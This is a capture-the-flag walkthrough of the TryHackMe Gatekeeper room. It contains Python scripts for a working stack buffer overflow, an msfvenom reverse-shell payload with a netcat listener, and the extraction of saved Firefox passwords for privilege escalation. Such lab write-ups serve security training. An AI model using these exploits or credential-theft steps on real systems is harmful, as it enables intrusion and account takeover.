Gatekeeper - Buffer Overflow

TryHackMe link: https://tryhackme.com/room/gatekeeper
Recon
Let’s get started with the nmap scan. I also kicked off the threader3000 port scanner script (https://github.com/dievus/threader3000.git) which I have started to like a lot since it often reveals ports that were missed by nmap scans.
# nmap -Pn -A -T4 -oN gatekeeper.nmap.txt 10.10.200.236
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-29 09:15 EST
Nmap scan report for 10.10.200.236
Host is up (0.078s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2020-11-28T14:03:48
|_Not valid after:  2021-05-30T14:03:48
|_ssl-date: 2020-11-29T14:18:50+00:00; 0s from scanner time.
31337/tcp open  Elite?
| fingerprint-strings:
|   FourOhFourRequest:
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines:
|     Hello
|     Hello
|   GetRequest:
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions:
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help:
|     Hello HELP
|   Kerberos:
|     Hello !!!
|   LDAPSearchReq:
|     Hello 0
|     Hello
|   LPDString:
|     Hello
|     default!!!
|   RTSPRequest:
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions:
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_    Hello
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49160/tcp open  msrpc          Microsoft Windows RPC
49161/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h14m59s, deviation: 2h30m00s, median: -1s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:90:ad:0c:68:97 (unknown)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-29T09:18:44-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-11-29T14:18:44
|_  start_date: 2020-11-29T14:03:47

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   8.23 ms  10.6.0.1
2   ... 3
4   77.60 ms 10.10.200.236

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.97 seconds

Some important observations -
- Threader3000 came back with the same list of ports, which is reassuring.
- Port 31337/tcp (nmap guesses the service as "Elite") looks the most interesting: it echoes whatever it receives back with a "Hello" prefix.
- SMB accepts a guest login, which may let us look around the shares.
# nc 10.10.200.236 31337
hello
Hello hello!!!
sadsadfsadfdsfdsfdsfdfsdfsdfsdfdsfsdfsfsdfsfsdfsdfsdfsfafsdfds
Hello sadsadfsadfdsfdsfdsfdfsdfsdfsdfdsfsdfsfsdfsfsdfsdfsdfsfafsdfds!!!

Enumeration
SMB Share enumeration
Let's run smbmap to list the SMB shares and their permissions. Notice that the Users share is READONLY for the guest user; that could be our way in.
eneloop@kinetic:~$ smbmap -u guest -H 10.10.200.236
[+] IP: 10.10.200.236:445    Name: 10.10.200.236
        Disk        Permissions    Comment
        ----        -----------    -------
        ADMIN$      NO ACCESS      Remote Admin
        C$          NO ACCESS      Default share
        IPC$        NO ACCESS      Remote IPC
        Users       READONLY
eneloop@kinetic:~$
Connect to the share and look around: you will find gatekeeper.exe, which is most likely the service listening on port 31337, and we can try to exploit it.
eneloop@kinetic:~$ smbclient //10.10.200.236/Users -U guest
Enter WORKGROUP\guest's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Thu May 14 21:57:08 2020
  ..                                 DR        0  Thu May 14 21:57:08 2020
  Default                           DHR        0  Tue Jul 14 03:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009
  Share                               D        0  Thu May 14 21:58:07 2020

                7863807 blocks of size 4096. 3820448 blocks available
smb: \> cd share
smb: \share\> dir
  .                                   D        0  Thu May 14 21:58:07 2020
  ..                                  D        0  Thu May 14 21:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 01:27:17 2020

                7863807 blocks of size 4096. 3845396 blocks available
smb: \share\>

Let's download the file for further inspection -
smb: \share\> get gatekeeper.exe
getting file \share\gatekeeper.exe of size 13312 as gatekeeper.exe (33.3 KiloBytes/sec) (average 33.3 KiloBytes/sec)
Exploit
Prepare for reverse engineering of the application
Fire up your Windows VM (any Windows host will do) and copy gatekeeper.exe to a location of your choice. This machine needs to be prepared so we can run the binary under a debugger and analyze the stack.
Here are the tools we need installed on this Windows machine -
- Immunity Debugger (https://www.immunityinc.com/products/debugger/)
- Mona (https://github.com/corelan/mona)
Follow each tool's own instructions to install and configure it. Once done, launch Immunity Debugger as administrator.

DLL Error Fix
If Immunity Debugger reports a missing DLL when you load the binary, download the 32-bit Microsoft Visual C++ Redistributable and install it on your Windows machine.

https://www.microsoft.com/en-us/download/details.aspx?id=52685
High level approach
- Send strings of A's of increasing length and check whether the application crashes. Once it does, EIP will be overwritten with A's, but we still won't know at which offset in the buffer that happens.
- Based on the approximate crash length from above, generate a cyclic pattern of that size and note the EIP contents after the crash. This tells us the exact EIP offset.
- Once we control EIP, use mona to identify the bad characters (this may take several iterations, one per bad character found), then generate a payload that gives us a reverse shell.
- Run the exploit against the THM host and gain access.
import socket, time, sys

ip = "10.0.0.11"
port = 31337
timeout = 5

# Strings of 100, 200, ... 3000 A's
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        print("Sending %s bytes" % len(string))
        # Python 3 sockets take bytes, so encode before sending
        s.send(bytes(string + "\r\n", "latin-1"))
        s.recv(1024)
        s.close()
    except Exception:
        # No answer: the service most likely crashed on this string
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

The program crashed at around 200 bytes. Looking at the registers in the debugger, EIP now contains \x41\x41\x41\x41, which is AAAA.

Now let's write a similar program that sends 200 + 400 = 600 bytes of a cyclic pattern, so we can identify the exact offset at which EIP is overwritten.
# msf-pattern_create -l 600
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

Now restart Immunity, make sure the application is running, and write a small script that sends the pattern so we can identify the offset for EIP.
import socket

ip = "10.0.0.11"
port = 31337
prefix = ""
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending buffer...")
    # Python 3 sockets take bytes, so encode before sending
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except Exception:
    print("Could not connect.")

This should crash the program again, but this time EIP holds four bytes of the pattern. In the debugger, EIP reads 39654138.

From that value you can now compute the offset: 146.
# msf-pattern_offset -q 39654138
[*] Exact match at offset 146
Now let's confirm control of EIP by placing BBBB (0x42) where the return address goes. The same script also sends every byte from \x01 to \xff after it, which is the starting point for the bad-character hunt. Restart the debugger, run the program again, then run the following script -
import socket
ip = "10.0.0.11"
port = 31337
prefix = ""
offset = 146
overflow = "A" * offset
# retn = ""
retn = "BBBB"
padding = ""

payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending buffer...")
    # latin-1 maps each \xNN escape in the payload to exactly that byte value
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except Exception:
    print("Could not connect.")

Start by generating a byte array that excludes \x00 (a null byte terminates C strings, so it is treated as bad from the outset), then compare that file against what actually landed on the stack; the address passed to -a is where the payload starts in memory, read from the debugger after the crash.
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 006719e4

The comparison stops matching at \x0a, so regenerate the array without that byte as well.
!mona bytearray -b "\x00\x0a"
Adjust the payload in the script to remove the \x0a character too and resend it, then compare memory and file contents again in the debugger to identify any additional bad characters.
!mona compare -f C:\mona\oscp\bytearray.bin -a 007319e4
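The core of what "!mona compare" does in the two rounds above, as an added example (not the walkthrough's or mona's code) run against a constructed copy of the stack; the fake_service_copy function, which drops everything from the first newline on, is an assumption standing in for the real service so the \x0a result can be reproduced offline.

```python
# Added example, not mona's code: a minimal "!mona compare" run against a
# constructed stack copy so the \x0a finding can be reproduced offline.


def bytearray_without(excluded):
    """Bytes 0x01..0xff minus the characters already known to be bad
    (what "!mona bytearray -b" writes to bytearray.bin)."""
    return bytes(b for b in range(1, 256) if b not in excluded)


def find_bad_char(sent, in_memory):
    """Return the first byte of `sent` that did not reach memory intact, or None.

    Only the first mismatch is trusted: once the service mangles or truncates
    at one byte, everything after it is unreliable, so the hunt is iterative
    (exclude that byte, resend, compare again), exactly as done in the room.
    """
    for i, expected in enumerate(sent):
        if i >= len(in_memory) or in_memory[i] != expected:
            return expected
    return None


def fake_service_copy(data):
    """Assumed behaviour for this demo only: the service reads one line, so
    its copy on the stack stops at the first newline (\\x0a)."""
    return data.split(b"\n", 1)[0]


def bad_char_hunt(service_copy=fake_service_copy, known_bad=(0x00,)):
    """Repeat bytearray/compare until a full array survives; return the bad chars."""
    bad = set(known_bad)
    while True:
        probe = bytearray_without(bad)
        found = find_bad_char(probe, service_copy(probe))
        if found is None:
            return sorted(bad)
        bad.add(found)


if __name__ == "__main__":
    print([hex(b) for b in bad_char_hunt()])   # ['0x0', '0xa']
```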

Next, find JMP pointers that we can use as the return address for the exploit -

We can use the first pointer, 0x080414c3 (\x08\x04\x14\xc3), as our return address. Since the x86 architecture Windows is running on here is little-endian, the address must be written byte-reversed in the script: \xc3\x14\x04\x08.
Now let's build a payload that avoids the bad characters we identified and try to get a reverse shell.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.8 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f py
Plug the generated bytes in as the payload and fire the script while gatekeeper.exe is running in the debugger. Don't forget to start a local listener on port 4444 first. The exploit should succeed and give you a shell.
# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.133.127] 49173
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Now that the local copy of gatekeeper.exe is exploited, change the IP in the script to that of the THM machine and fire the exploit again. This should give you a low-privileged shell on the target.
Looking around, you will find user.txt.txt containing the user flag. Note the other files too: gatekeeperstart.bat tries to restart the gatekeeper service every 5 minutes, which could be a scheduled job worth exploiting, and Firefox.lnk is just a shortcut but turns out to be a breadcrumb, as you will see further on.
C:\Users\natbat\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\natbat\Desktop

05/14/2020  08:24 PM    <DIR>          .
05/14/2020  08:24 PM    <DIR>          ..
04/21/2020  04:00 PM             1,197 Firefox.lnk
04/20/2020  12:27 AM            13,312 gatekeeper.exe
04/21/2020  08:53 PM               135 gatekeeperstart.bat
05/14/2020  08:43 PM               140 user.txt.txt
               4 File(s)         14,784 bytes
               2 Dir(s)  15,878,447,104 bytes free

C:\Users\natbat\Desktop>type Firefox.lnk
type Firefox.lnk
[binary shortcut data; the readable strings include the target C:\Users\natbat\AppData\Local\Mozilla Firefox\firefox.exe and the working directory C:\Users\natbat\AppData\Local\Mozilla Firefox]
C:\Users\natbat\Desktop>

Post-Exploitation/Privesc
Upload WinPEAS using smb share.
The root of the Users share is READONLY, but after changing directory into Share you can write. Upload winPEAS.bat there so we can run it from the shell.
# smbclient //10.10.133.127/Users -U guest
Enter WORKGROUP\guest's password:
Try "help" to get a list of possible commands.
smb: \> put winPEAS.bat
NT_STATUS_ACCESS_DENIED opening remote file \winPEAS.bat
smb: \> pwd
Current directory is \\10.10.133.127\Users\
smb: \> dir
  .                                  DR        0  Thu May 14 21:57:08 2020
  ..                                 DR        0  Thu May 14 21:57:08 2020
  Default                           DHR        0  Tue Jul 14 03:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009
  Share                               D        0  Thu May 14 21:58:07 2020

                7863807 blocks of size 4096. 3876583 blocks available

smb: \> cd Share
smb: \Share\> put winPEAS.bat
putting file winPEAS.bat as \Share\winPEAS.bat (101.4 kb/s) (average 101.4 kb/s)
smb: \Share\>

The WinPEAS script ran for several minutes, so be patient. It comes back with a lot of information, so take your time to go through all of it. Towards the very last section of the report you will notice a Firefox profile location, which is a candidate for extracting saved credentials. Before choosing a path for PrivEsc, I typically take the easiest routes first as we can rule them out quickly and then focus on complex paths which need more time and often end up being rabbit holes.
 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys

C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\places.sqlite
C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release\key4.db
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\winsxs\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_6f0f7833cb71e18d\appcmd.exe
C:\Windows\winsxs\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_79642285ffd2a388\appcmd.exe

I uploaded the firefox_decrypt script using the same method used for winPEAS, but it did not help much as the Windows machine did not have Python installed.
We can download the profile to our attack machine and decrypt it locally instead. From the shell, copy the profiles to the C:\Users\Share directory, then download them from there with smbclient, as shown below.
C:\Users\natbat\AppData\Roaming\Mozilla\Firefox>Xcopy /E /I Profiles C:\Users\Share
Xcopy /E /I Profiles C:\Users\Share
Overwrite C:\Users\Share\copy (Yes/No/All)? All
A
Profiles\copy
Profiles\ljfn812a.default-release\addons.json
Profiles\ljfn812a.default-release\addonStartup.json.lz4
Profiles\ljfn812a.default-release\AlternateServices.txt
Profiles\ljfn812a.default-release\broadcast-listeners.json
Profiles\ljfn812a.default-release\cert9.db
Profiles\ljfn812a.default-release\compatibility.ini
Profiles\ljfn812a.default-release\containers.json
Profiles\ljfn812a.default-release\content-prefs.sqlite
Profiles\ljfn812a.default-release\cookies.sqlite
Profiles\ljfn812a.default-release\extension-preferences.json

..
..
..
..
Download these files to your attack machine, where we can try to extract the saved passwords.
# smbclient //10.10.133.127/Users -U guest
Enter WORKGROUP\guest's password:
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\10.10.133.127\Users\
smb: \> dir
  .                                  DR        0  Thu May 14 21:57:08 2020
  ..                                 DR        0  Thu May 14 21:57:08 2020
  Default                           DHR        0  Tue Jul 14 03:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009
  Share                             DAn        0  Mon Nov 30 23:23:00 2020

                7863807 blocks of size 4096. 3831106 blocks available
smb: \> cd Share
smb: \Share\> recurse on
smb: \Share\> prompt off
smb: \Share\> mget *
getting file \Share\copy of size 0 as copy (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Share\firefox_decrypt.py of size 34624 as firefox_decrypt.py (62.4 KiloBytes/sec) (average 40.1 KiloBytes/sec)
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (31.7 KiloBytes/sec) (average 37.4 KiloBytes/sec)
getting file \Share\ljfn812a.default-release\addons.json of size 24 as addons.json (0.1 KiloBytes/sec) (average 28.2 KiloBytes/sec)
getting file \Share\ljfn812a.default-release\addonStartup.json.lz4 of size 1952 as addonStartup.json.lz4 (4.4 KiloBytes/sec) (average 23.2 KiloBytes/sec)
getting file \Share\ljfn812a.default-release\AlternateServices.txt of size 0 as AlternateServices.txt (0.0 KiloBytes/sec) (average 20.5 KiloBytes/sec)
Now run firefox_decrypt locally against the downloaded profile; it reveals the saved password for the user "mayor" as below -
# python ./firefox_decrypt.py gatekeeper/data/firefox/ljfn812a.default-release/
2020-11-30 23:32:02,386 - WARNING - profile.ini not found in gatekeeper/data/firefox/ljfn812a.default-release/
2020-11-30 23:32:02,386 - WARNING - Continuing and assuming 'gatekeeper/data/firefox/ljfn812a.default-release/' is a profile location

Master Password for profile gatekeeper/data/firefox/ljfn812a.default-release/:
2020-11-30 23:32:13,034 - WARNING - Attempting decryption with no Master Password

Website:   https://creds.com
Username: 'mayor'
Password: 'XXXXXXXXXXXXXXXXXXXXX'

With these credentials, I fired up Remmina (Remote desktop client) and connected to the machine remotely.

You may have to wait a minute or two to get the desktop screen.

You will see the root flag inside root.txt file on the desktop.

And that's how you root this wonderful machine! I am very sure there are more ways to get root on this machine. If you have questions/suggestions, please feel free to write me an email.
- wirem0nster